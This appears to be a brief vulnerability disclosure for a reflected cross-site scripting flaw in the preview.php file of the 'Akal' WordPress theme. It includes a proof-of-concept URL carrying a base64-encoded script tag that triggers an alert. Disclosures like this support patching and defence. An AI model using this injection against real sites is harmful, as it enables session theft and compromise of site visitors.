The premium theme, Akal, suffers from a Reflected Cross-Site Scripting (XSS) vulnerability in the preview.php file located in framework/brad-shortcodes/tinymce.
http://example.com/wp-content/themes/akal/framework/brad-shortcodes/tinymce/preview.php?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=